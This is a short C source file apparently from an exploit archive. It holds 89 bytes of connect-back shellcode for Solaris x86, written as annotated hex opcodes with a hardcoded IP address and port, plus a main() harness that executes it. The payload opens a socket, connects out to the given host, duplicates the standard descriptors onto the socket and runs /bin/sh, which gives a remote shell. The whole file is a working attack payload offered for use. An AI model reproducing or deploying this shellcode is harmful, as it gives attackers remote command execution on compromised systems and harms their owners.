/* 89 bytes connect-back shellcode - Solaris-x86
 * - by bighawk (bighawk@warfare.com)
 *
 * This shellcode connects back to you
 * Tested on: SunOS 5.7
 */
 
#define IPADDR  "\x03\x01\x33\x07"
#define PORT    "\x28\x11"              /* htons(10000) */

char code[] =
   "\xb8\xff\xf8\xff\x3c"	// mov    eax, 03cfff8ffh
   "\xf7\xd0"			// not    eax
   "\x50"			// push   eax
   "\x31\xc0"			// xor    eax, eax
   "\xb0\x9a"			// mov    al, 09ah
   "\x50"			// push   eax
   "\x89\xe5"			// mov    ebp, esp
   "\x31\xc9"			// xor    ecx, ecx
   "\x51"			// push   ecx
   "\x41"			// inc    ecx
   "\x41"			// inc    ecx
   "\x51"			// push   ecx
   "\x51"			// push   ecx
   "\xb0\xe6"			// mov    al, 230
   "\xff\xd5"			// call   ebp
   "\x31\xd2"			// xor    edx, edx
   "\x89\xc7"			// mov    edi, eax
   "\x68"IPADDR			// push   dword IPADDR
   "\x66\x68"PORT		// push   word PORT
   "\x66\x51"			// push   cx
   "\x89\xe6"			// mov    esi, esp
   "\x6a\x10"			// push   byte 16
   "\x56"			// push   esi
   "\x57"			// push   edi
   "\xb0\xeb"			// mov    al, 235
   "\xff\xd5"			// call   ebp
   "\x31\xd2"			// xor    edx, edx
   "\xb2\x09"			// mov    dl, 9
   "\x51"			// push   ecx
   "\x52"			// push   edx
   "\x57"			// push   edi
   "\xb0\x3e"			// mov    al, 62
   "\xff\xd5"			// call   ebp
   "\x49"			// dec    ecx
   "\x79\xf2"			// jns    lp
   "\x50"			// push   eax
   "\x68\x2f\x2f\x73\x68"	// push   dword 68732f2fh
   "\x68\x2f\x62\x69\x6e"	// push   dword 6e69622fh
   "\x89\xe3"			// mov    ebx, esp
   "\x50"			// push   eax
   "\x53"			// push   ebx
   "\x89\xe2"			// mov    edx, esp
   "\x50"			// push   eax
   "\x52"			// push   edx
   "\x53"			// push   ebx
   "\xb0\x3b"			// mov    al, 59
   "\xff\xd5";			// call   ebp

main() {
  void (*a)() = (void *)code;
  printf("size: %d bytes\n", strlen(code));
  a();
}